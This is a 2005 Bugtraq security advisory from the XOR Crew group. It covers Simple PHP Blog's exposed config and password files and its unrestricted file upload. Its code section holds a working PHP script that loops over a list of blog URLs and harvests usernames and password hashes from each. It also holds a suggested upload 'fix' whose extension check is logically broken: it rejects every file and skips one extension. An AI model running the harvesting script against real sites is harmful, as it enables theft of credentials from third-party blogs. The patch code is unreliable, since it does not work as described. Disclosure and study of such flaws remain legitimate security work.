Simple PHP Blog File Upload and User Credentials Exposure Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Simple PHP Blog File Upload and User Credentials Exposure Vulnerabilities
From: Scott Dewey <wr0ck@xxxxxxxxxxx>
Date: Thu, 25 Aug 2005 22:27:27 -0400
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mozilla Thunderbird 1.0.6 (Windows/20050716)

===============================================================================
XOR Crew :: Security Advisory                                  8/25/2005
===============================================================================

Simple PHP Blog File Upload and User Credentials ExposureVulnerabilities

===============================================================================
http://www.xorcrew.net/
===============================================================================

:: Summary

      Vendor       :  Alexander Palmo
      Vendor Site  :  http://www.simplephpblog.com/
      Product(s)   :  Simple PHP Blog (SPHPBlog)
      Version(s)   :  All
      Severity     :  Medium/High
      Release Date :  8/25/2005
      Impact       :  Unauthorized file upload,
                   :  Exposure of user credentials.
      Credits      :  ReZEN (rezen (a) xorcrew (.) net),
                   :  0xception (oxception (a) xorcrew (.) net).

===============================================================================

I. Description

Simple PHP Blog is PHP (4 or greater) based blogging application thatwas written with simplicity of installation and maintenance in mind.Unlike other blog software, there is almost no setup - just unzip andcopy. It is a dead-simple blog that doesn't require a database. It usesflat text files, and looks nice.


===============================================================================

II. Synopsis

The Simple PHP Blog application has two vulnerabilities present withinit that when used together, can allow an attacker to arbitrarily uploadfiles to the server. The first vulnerability has to do with insecuredefault file permissions and placement of config.txt and password.txt,and leaves both files fully accessible to unauthorized users. Thisproblem was realized earlier in February, unknown to us. The fix forthat is to simply `.htaccess' the config directory of the blogger'sdirectory tree.

The second of the two vulnerabilities lies within the image uploadsystem provided to (il?)legitimate, logged-in users. There is no imagevalidation function in the blogger to stop an unauthorized user fromuploading any file they want to to the server. The vendor has beencontacted and has failed to reply. This is a problem that has yet to beaddressed.


===============================================================================

III. Code/PoC

Insecure file upload - fix by ReZEN:

Add to upload_img_cgi.php at line 19:

-----BEGIN-----

$no = array( "exe", "pl", "php", "php3", "php4", "php5", "phps", "asp",
"cgi", "html", "htm" );
for( $i = 0; $i < 10; $i++ )
 {
  if( strpos( $uploadfile, $no[$i] ) >= 0 )
   {
    echo "That filetype is not allowed";
    exit;
   }
 }

------END------

PoC code to harvest usernames and passwords from vulnerable blogs,
given a list of URLs:

-----BEGIN-----

<?php
/********************************************

Stupid Script to grab usernames
and password hashes form Simple PHP Blog
Coded by ReZEN of XOR
http://www.xorcrew.net/ReZEN
ReZEN (AT) xorcrew (DOT) net
Greetz: wr0ck, 0xception, tendo, ld, smirks,
ajax, gml(i miss you), Infintiy, my friends
My loving parents =] and anyone else i forgot

*********************************************/

$pdir = "config/password.txt";
$udir = "config/config.txt";
$urllist = "urls.txt";  //List of Blog Urls
$i = 0;
$fp = fopen( $urllist, 'rb' );

if( !$fp )
 {
  echo "Unable to open: ".$urllist."<br><br>";
 }
else
 {
  while ( !feof ( $fp ) )
   {
    $url[$i] = fgets ( $fp, 1000 );
    $url[$i] = trim( $url[$i] );
    $i = $i + 1;
   }
  $limit = $i;
  fclose( $fp );
 }

for( $i = 0; $i < $limit; $i++ )
 {
  $fp = fopen( $url[$i].$pdir, 'rb' );
  if ( !$fp )
   {
    echo "Unable to get: ".$url.$pdir."<br><br>";
   }
  else
   {
    $pass = fread($fp, 1000);
    fclose($fp);
   }

  $fp = fopen( $url[$i].$udir, 'rb' );

  if (!$fp)
   {
    echo "Unable to get: ".$url.$udir."<br><br>";
   }
  else
   {
    $conf = fread( $fp, 1000 );
    fclose( $fp );
   }

  $user = explode( "|", $conf );
  echo $user[1].":".$pass."<br>";
  $user = "";
  $pass = "";
 }
?>

------END------

===============================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, k&k, seeprompt, the rest.

===============================================================================

Prev by Date: Multiple PHP Images Galleries EXIF Metadata XSS Vulnerabilities
Next by Date: DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'
Previous by thread: Multiple PHP Images Galleries EXIF Metadata XSS Vulnerabilities
Next by thread: DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'
Index(es):
- Date
- Thread